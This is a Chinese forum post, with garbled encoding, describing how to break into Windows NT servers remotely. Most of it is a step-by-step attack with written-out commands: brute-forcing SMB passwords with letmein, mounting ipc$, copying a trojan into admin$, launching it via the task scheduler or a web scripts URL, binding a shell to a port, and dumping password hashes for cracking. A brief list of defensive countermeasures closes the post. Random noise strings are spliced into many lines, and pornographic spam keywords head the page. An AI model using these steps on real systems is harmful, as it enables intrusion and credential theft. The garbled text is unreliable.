国产十八禁AV网站,欧美日韩亚洲国产综合乱,亚洲国产aⅴ成人精品无吗,秋霞午夜福利影院合集





      

      汶上信息港
      
標(biāo)題: 遠(yuǎn)程入侵NT ----spp(低音炮) [打印本頁]
      

      
作者: 雜七雜八    時(shí)間: 2011-1-12 16:31
      
標(biāo)題: 遠(yuǎn)程入侵NT ----spp(低音炮)
      看了篇文章介紹使用netbus 或 netspy 遠(yuǎn)程入侵nt系統(tǒng),感覺真是。??磥韓t系統(tǒng)的共享機(jī)制如果不配合火墻使用,SMB會(huì)給你造成很大麻煩。。 連小小 只的木馬都可以讓nt管理員頭大。 
      
. F/ V0 z: A* r5 A, {    其攻擊過程如下: % F" q2 z4 d, o* l  c1 F; [
      
1、使用掃描工具查找NT主機(jī)       
      
9 E5 n$ ?4 R: j- s2 、確定攻擊目標(biāo)后,使用letmein 對目標(biāo)主機(jī)進(jìn)行攻擊, 如: ' U  G+ Y! i7 @* H! F# b  o
      
letmein file://x.x.x.x/ -all -g mypwd (對\\x.x.x.x上所有用戶攻擊) 
      
; K+ F% R, y# T. l. z# `letmein file://x.x.x.x/ -admin -g mypwd (對\\x.x.x.x上管理員攻擊) 
      
+ u2 r+ b2 \" S" T8 r$ g6 lletmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶) & U8 z! L6 I* q0 L1 Q& `$ h
      
注:- 確定目標(biāo)后,收集目標(biāo)信息并嘗試取得非法資源 & ?7 b! ^0 q' M* b' F, e
      
3、當(dāng)letmein 獲取相關(guān)管理員權(quán)限后,使用ms提供的合法命令: % s& B, A5 w5 Q% y  R5 R6 X
      
net use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠(yuǎn)程資源并將木馬拷入遠(yuǎn)程 + }" r- C' _$ D1 ?; ?9 {
      
copy x:\netserver.exe \\x.x.x.x\admin$\system32 
      
. H! z0 `" t$ ^* E; I3 @2 I4、使用合法ms命令遠(yuǎn)程啟動(dòng)木馬服務(wù): 
      
! T- V1 Z3 i4 }3 t& jnetsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg 
      
( [# P' t, p4 G3 E- _/ E
      
+ F4 L- c& i! {% X   該方法有其巧妙之處。。利用nt的任務(wù)計(jì)劃管理,在特定時(shí)候啟動(dòng)木馬服務(wù) / e) y$ _0 L" C. i! y- b
      

      
' ~/ f+ K  k  x5 C( W' Z, r5 r   另一種方法: ' U2 [" a/ l* C6 r0 z
      
   將ntsrver.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄, 如cgi-bin或scripts,然后在瀏覽器鍵入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務(wù)將被啟動(dòng)
      
# `8 h3 r' t( G0 T  ^
      
+ e/ ]! E4 j+ U8 ^    到此,該次攻擊可以算成功了,遠(yuǎn)程資源已在別人控制下。 # \0 @) z! ~& w* \8 a) E0 f; C
      
    如果在遠(yuǎn)程使用app redirect 啟動(dòng)一個(gè)cmd.exe到特定端口 , 那么你可以telnet 到該端口,更方便使用該遠(yuǎn)程資源 。比如:使用pwdump 將遠(yuǎn)程nt上所有用戶和密碼 dump成文件,回傳本地,使用其他工具如l0phtcrack來運(yùn)算。 分析該次攻擊的整體過程,不難看出,關(guān)鍵步驟是letmein取得admin權(quán)限,但是很不幸,就目前廈門(有些是省內(nèi))的nt服務(wù)器管理員而言,密碼對letmein只是多花幾分鐘而已。我對某些大的公共平臺服務(wù)器進(jìn)行掃描的結(jié)果,除了solaris和linux系統(tǒng)之外,其余的nt被letmein猜中率有75%以上。而且在這些被進(jìn)入的機(jī)器上,SMB都有在tcp/ip上 跑,有兩臺有配備火墻,但是沒有封閉對外137-139口。 
      
5 q$ U6 \& V0 F' |" S4 k( g6 ?, v2 a- x$ ^. y, r* x+ _
      
     對策: 7 X$ j3 @% M$ \- B  t
      
1、還是老話,密碼的選擇問題,使用向..@2KjsfiM7v!09..這樣的密碼會(huì)讓任何使用 暴力法計(jì)算的機(jī)器算到cpu燒掉。 
      
3 ?6 C$ F! e- @/ ~2、nt網(wǎng)絡(luò)的適當(dāng)配置,不要在對外的nc綁定共享服務(wù)是個(gè)好習(xí)慣,特別是tcp/ip協(xié)議。 7 ]0 u$ Q9 Z; ?0 H4 ?) H* X
      
3、防火墻的配置,屏蔽一切不需要的服務(wù)端口,象netebui在tcp/ip上的137-139口,開這些口只會(huì)使你的系統(tǒng)處于危險(xiǎn)的處境,如果非要在遠(yuǎn)程使用這些口的服務(wù),建議使用其他軟件來代替。 % v0 j* E1 }, t" |# d2 ^! \- t
      
4、及時(shí)檢查日記和監(jiān)控服務(wù)的運(yùn)行,定時(shí)對文件系統(tǒng)的權(quán)限受托關(guān)系進(jìn)行檢查。 
      
% n. x  m; X  A* A5、管理人員素質(zhì)的提高,安全風(fēng)險(xiǎn)意思加強(qiáng)無疑對你管理的系統(tǒng)有很多好處。 -- SPP 10Hz的低頻 你聽不到的聲音卻無時(shí)不刻在影響著你 。
      
% y9 }1 n9 M1 n, o2 X




      

      

      歡迎光臨 汶上信息港 (http://yh18.cn/)

Powered by Discuz! X3.5